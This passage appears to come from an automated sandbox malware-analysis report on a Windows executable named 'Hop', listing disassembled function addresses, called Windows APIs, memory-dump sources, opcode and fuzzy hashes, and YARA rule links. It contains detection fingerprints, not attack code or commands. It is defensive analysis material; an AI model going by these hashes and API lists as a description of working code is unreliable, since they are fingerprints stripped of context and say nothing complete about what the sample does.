                                                                                                                                                                                                                                                                                                          • SetBkColor.GDI32(?,?,?,?,?,?,?,?,?,00007FF68C4324CF), ref: 00007FF68C43270D
                                                                                                                                                                                                                                                                                                          • DefDlgProcW.USER32(?,?,?,?,?,?,?,?,?,00007FF68C4324CF), ref: 00007FF68C432786
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ColorProc$LongWindow
                                                                                                                                                                                                                                                                                                          • String ID: +
                                                                                                                                                                                                                                                                                                          • API String ID: 3744519093-2126386893
                                                                                                                                                                                                                                                                                                          • Opcode ID: 3425f7cae65ff3b8154dcce6daa2999f053df4a4d3f6ea96a2573c11bc76522f
                                                                                                                                                                                                                                                                                                          • Instruction ID: f943fda31b5216f3233b8c565652c5de3be8885eaf54ec093476fb54d0ca288c
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3425f7cae65ff3b8154dcce6daa2999f053df4a4d3f6ea96a2573c11bc76522f
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 85E1BD31A0C24AC2E6708E29655897A66A5FF89BD8F44523DD88DC7BE7CF6DE1C0D700
                                                                                                                                                                                                                                                                                                          Function 00007FF68C4C8CB0 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 331COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                                          • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                                                                                                                                                                                                          • API String ID: 0-572801152
                                                                                                                                                                                                                                                                                                          • Opcode ID: 5c1a4e62a646acb0bd1b5f4cc6a62ef7cbaeb95efe67bf12c35b99f614103513
                                                                                                                                                                                                                                                                                                          • Instruction ID: 2d47a26f3d952046f34180e00b65abd14959d952e2d17dee45e851430c99b0f7
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5c1a4e62a646acb0bd1b5f4cc6a62ef7cbaeb95efe67bf12c35b99f614103513
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 39E19076A08B82D6EB10CF65D4402AD77A0FF94B98F41413ADA5D97BA4DF3CE589C700
                                                                                                                                                                                                                                                                                                          Function 00007FF68C4B368C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 58COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                                                                                                                                                                                                          • String ID: SCRIPT
                                                                                                                                                                                                                                                                                                          • API String ID: 3051347437-3967369404
                                                                                                                                                                                                                                                                                                          • Opcode ID: d5206061f2b3ac5e17ee2dd1b5fd8c27282f55e584baf03c5003c8e6f72eae5e
                                                                                                                                                                                                                                                                                                          • Instruction ID: 868e1fe04a758377fda0e7aa4941f27e4bdbd86183f0e607c16744d22887aceb
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d5206061f2b3ac5e17ee2dd1b5fd8c27282f55e584baf03c5003c8e6f72eae5e
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C6213D76A08B41C2EB10CB26E458B2963A0FF89F99F054439DE4E83B54DF3DE485C700
                                                                                                                                                                                                                                                                                                          Function 00007FF68C435C44 Relevance: 9.2, APIs: 6, Instructions: 239COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Process$CurrentInfoSystemVersionWow64
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1568231622-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 79e0420c2984852e5f59fe1e813506d9fafb4aaa62b9c0ac84c7f4c88eda00f4
                                                                                                                                                                                                                                                                                                          • Instruction ID: 800f2693cda9b54d17644e388e7c42dfc0d96161a11e8409b29e7f063479367d
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 79e0420c2984852e5f59fe1e813506d9fafb4aaa62b9c0ac84c7f4c88eda00f4
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 23C1A031E0E282C5FE618B20B8215752BE0BF99788F84803DD58DC3AA5EF6CB554D793
                                                                                                                                                                                                                                                                                                          Function 00007FF68C467DFC Relevance: 9.2, APIs: 6, Instructions: 236COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: _get_daylight$_isindst$_invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1405656091-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 3e809ee0917d980967337eb290ae9f657cbcc700f628c2feb101ff6f2151edd5
                                                                                                                                                                                                                                                                                                          • Instruction ID: 6ccee08fb9d75c09f851562f80bcdcf0b1156c9e8260e73bb5083622d056cb12
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3e809ee0917d980967337eb290ae9f657cbcc700f628c2feb101ff6f2151edd5
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3C8194B2B0464687FB589E25C941BA927A5FF5478CF149039DB0D8BB89EF3CE581C740
                                                                                                                                                                                                                                                                                                          Function 00007FF68C46AD08 Relevance: 9.1, APIs: 6, Instructions: 83COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1239891234-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: c1a2dea820685187a1b1ee23aeb9defc365f229fa0d1b3730a4ebbe8088e0426
                                                                                                                                                                                                                                                                                                          • Instruction ID: ec83397a44ae4897b923dc8624cce690bac564ae60d852561d3e24719e00ef70
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c1a2dea820685187a1b1ee23aeb9defc365f229fa0d1b3730a4ebbe8088e0426
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FC314276608F81C6EB60CF25E8406AE73A4FF84758F544139EA8D87B59DF38D595CB00
                                                                                                                                                                                                                                                                                                          Function 00007FF68C4676EC Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 262COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: _handle_error
                                                                                                                                                                                                                                                                                                          • String ID: !$VUUU$fmod
                                                                                                                                                                                                                                                                                                          • API String ID: 1757819995-2579133210
                                                                                                                                                                                                                                                                                                          • Opcode ID: 06f58ab4aaca2128c338277b14f38b089639c2a9de57a5825e67876a1165aa04
                                                                                                                                                                                                                                                                                                          • Instruction ID: cabf07349648d074672b26aee4d326fcaa5bee24719c0f46f1fbb5e8ef957605
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 06f58ab4aaca2128c338277b14f38b089639c2a9de57a5825e67876a1165aa04
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2EB1E951E1CFC485E6A38A3454513BAB359BFAA394F20C336DA5E76B64DF2CA5C2C700
                                                                                                                                                                                                                                                                                                          Function 00007FF68C472BB0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 169COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • _invalid_parameter_noinfo.LIBCMT ref: 00007FF68C472BF0
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF68C46AF34: GetCurrentProcess.KERNEL32(00007FF68C46B0A5), ref: 00007FF68C46AF61
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: CurrentProcess_invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                                          • String ID: *$.$.
                                                                                                                                                                                                                                                                                                          • API String ID: 2518042432-2112782162
                                                                                                                                                                                                                                                                                                          • Opcode ID: 4bc727eecd12c05f0579dc3a47633661258e4e13a894efe955ef075ebd1ec7be
                                                                                                                                                                                                                                                                                                          • Instruction ID: 8953461922de29a591e49620f280d48c986c2f8ce6b89f5dc37e881c26ee54d6
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4bc727eecd12c05f0579dc3a47633661258e4e13a894efe955ef075ebd1ec7be
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6751D062F14A5AC5FB20DBA699006BD27B4BF54BCCF548539CE0DA7B89DE38D482D300
                                                                                                                                                                                                                                                                                                          Function 00007FF68C455A40 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00007FF68C455AC3
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: DebugDebuggerErrorLastOutputPresentString
                                                                                                                                                                                                                                                                                                          • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                                                                                                                                                                                                          • API String ID: 389471666-631824599
                                                                                                                                                                                                                                                                                                          • Opcode ID: 8c783dfea8ab590eafe6bbf95db9fdce1a8e48e032f2d75969754b32e98ee1d6
                                                                                                                                                                                                                                                                                                          • Instruction ID: 2bfbc2b67545207b398cf228f4aae074c6c950598cb94141a329d9d2ab2c98b7
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8c783dfea8ab590eafe6bbf95db9fdce1a8e48e032f2d75969754b32e98ee1d6
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 99113632A14B42E6E704DB22E6943B933A4FF54369F404139DA4D83A90EF7CE4B8C710
                                                                                                                                                                                                                                                                                                          Function 00007FF68C4AC46C Relevance: 6.1, APIs: 4, Instructions: 101processCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1083639309-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: b4230e9694d6db5a2454d9ccaa2f058036f57f1eebbf8966ac4aac68c055cdad
                                                                                                                                                                                                                                                                                                          • Instruction ID: dfe33f47350aeb35439f28b322ec4c846c0f52d80d308ed36ee899ad72398654
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b4230e9694d6db5a2454d9ccaa2f058036f57f1eebbf8966ac4aac68c055cdad
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5341B022A18692C5E750EB21E4445BEA760FFC4B98F94403AFA8D93795DF7CE585C700
                                                                                                                                                                                                                                                                                                          Function 00007FF68C49DB9C Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3429775523-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 788e580e6745dde0bf41f1c5252257a7cd520450013a93ceb3609c7d43dd0201
                                                                                                                                                                                                                                                                                                          • Instruction ID: 039ad5b8aa993d767cec15f68c95b875af0a7eca893f2d32fc4b44ae9c67de9f
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 788e580e6745dde0bf41f1c5252257a7cd520450013a93ceb3609c7d43dd0201
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2001ED73624681CFE7208F20E4553A937B0FB5476EF510929F65986A99CF7DC298CB80
                                                                                                                                                                                                                                                                                                          Function 00007FF68C46BD88 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 23timeCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetSystemTimeAsFileTime.KERNEL32(?,?,?,00007FF68C4645EC,?,?,00000000,00007FF68C464669,?,?,?,?,?,00007FF68C4B2A9C), ref: 00007FF68C46BDCF
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Time$FileSystem
                                                                                                                                                                                                                                                                                                          • String ID: GetSystemTimePreciseAsFileTime
                                                                                                                                                                                                                                                                                                          • API String ID: 2086374402-595813830
                                                                                                                                                                                                                                                                                                          • Opcode ID: 1cedaef733c3405ac1024c3932ca1efceb4464d78796a11057d5787a90ded12e
                                                                                                                                                                                                                                                                                                          • Instruction ID: 7c9208881363ce27dbca7f7a1d5cf9a3e1155a2941ea29d4d125d23db155fe0a
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1cedaef733c3405ac1024c3932ca1efceb4464d78796a11057d5787a90ded12e
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A3F06D60A09A47C1FE05DB61F8405B87320BF48BE8F49503ADA4E8B75ADE3CE4C8D310
                                                                                                                                                                                                                                                                                                          Function 00007FF68C4B4124 Relevance: 3.0, APIs: 2, Instructions: 30windowCOMMON
